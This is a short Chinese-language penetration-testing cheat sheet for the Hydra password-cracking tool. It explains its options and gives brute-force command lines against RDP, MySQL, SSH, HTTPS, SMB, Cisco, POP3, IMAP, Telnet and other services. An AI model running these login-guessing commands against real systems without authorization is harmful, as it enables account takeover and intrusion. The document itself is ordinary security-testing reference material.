【渗透测试】hydra使用小结

 -R：继续从上一次进度接着破解

 -S：大写，采用SSL链接

 -s <PORT>：小写，可通过这个参数指定非默认端口

 -l <LOGIN>：指定破解的用户，对特定用户破解

 -L <FILE>：指定用户名字典

 -p <PASS>：小写，指定密码破解，少用，一般是采用密码字典

 -P <FILE>：大写，指定密码字典

 -e <ns>：可选选项，n：空密码试探，s：使用指定用户和密码试探

 -C <FILE>：使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数

 -M <FILE>：指定目标列表文件一行一条

 -o <FILE>：指定结果输出文件

 -f：在使用-M参数以后，找到第一对登录名或者密码的时候中止破解

 -t <TASKS>：同时运行的线程数，默认为16

 -w <TIME>：设置最大超时的时间，单位秒，默认是30s

 -v / -V：显示详细过程

 -o 可导出文件

 server：目标ip

 ------------------------------------------------------------------------------

     破解rdp()：

 # hydra -l administrator -P password.txt -V IP rdp

     破解mysql：

 # hydra ip -L 用户名 -P pass.txt -V mysql

     破解ssh：

 # hydra -L user.txt -P password.txt -e ns -vV IP ssh

     破解https：

 # hydra -m /index.php -l muts -P pass.txt IP https

     破解teamspeak：

 # hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

     破解cisco：

 # hydra -P pass.txt IP cisco

 # hydra -m cloud -P pass.txt IP cisco-enable

     破解smb：

 # hydra -l administrator -P pass.txt IP smb

     破解pop3：

 # hydra -l muts -P pass.txt my.pop3.mail pop3

     破解http-proxy：

 # hydra -l admin -P pass.txt http-proxy://IP

     破解imap：

 # hydra -L user.txt -p secret IP imap PLAIN

 # hydra -C defaults.txt - imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

     破解telnet

 # hydra ip telnet -l 用户 -P 密码字典 -t  -s  -e ns -f -V